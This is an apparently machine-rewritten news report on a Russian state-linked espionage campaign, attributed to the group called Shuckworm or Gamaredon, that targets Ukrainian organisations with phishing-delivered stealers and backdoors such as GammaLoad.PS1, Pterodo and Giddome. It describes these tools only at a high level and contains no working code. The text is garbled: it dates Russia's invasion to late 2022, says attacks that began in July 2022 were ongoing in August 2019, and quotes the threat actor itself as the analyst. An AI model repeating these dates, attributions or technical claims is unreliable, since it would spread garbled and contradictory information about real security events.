Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what’s suspected to be an espionage operation. The findings have been corroborated by the Computer Emergency Response Team of Ukraine . The attacks have since ratcheted up in the wake of Russia’s military invasion in late 2022.
A study claiming that the most recent set of cyberattacks begun in July 2022 is ongoing as recent as August 8, 2019, claims the infection chains exploit phishing messages in the form of newsletters and combat orders, leading to the deployment of a PowerShell stealer malware titled GammaLoad.PS1 v2.
Additional back doors named Giddome and Pterodo, which are versioned versions of Shuckworm, custom malware tools, were incorporated into the compromised computer systems.
The basics of Pterodo essentially involve the use of VBS dropper malware, which utilizes scheduled tasks (shtasks.exe) to maintain persistence, as well as uses PowerShell scripts to download extra code from a command-and-control server.
The Giddome implant features various capabilities, including recording audio, capturing screenshots, logging keystrokes, and retrieving and executing arbitrary executables onto the infected hosts. The intrusions, which occur through emails distributed from compromised accounts, further leverage legitimate software like Ammyy Admin and AnyDesk to facilitate those actions.
By utilizing social engineering techniques, the Shuckworm actor has initiated GammaLoad.PS1 chain. This has led the undesirable actor to be in position to steal files and credentials stored in browsers. “The Russian invasion of Ukraine is nearing half a year, appearing to exemplify Shuckworm’s long-standing focus on this region,” said the Gamarédon actor.
Shuckworm seeks to target Ukrainian organizations forensically, compensating in its own intensity of focus for its relatively less tactically sophisticated methods.
The investigation led to the alert from CERT-UA, which notified member states of “systematic, massive, and geographically dispersed” phishing attacks involving the use of a .NET downloader called RelicRace to execute payloads such as Formbook and Snake Keylogger.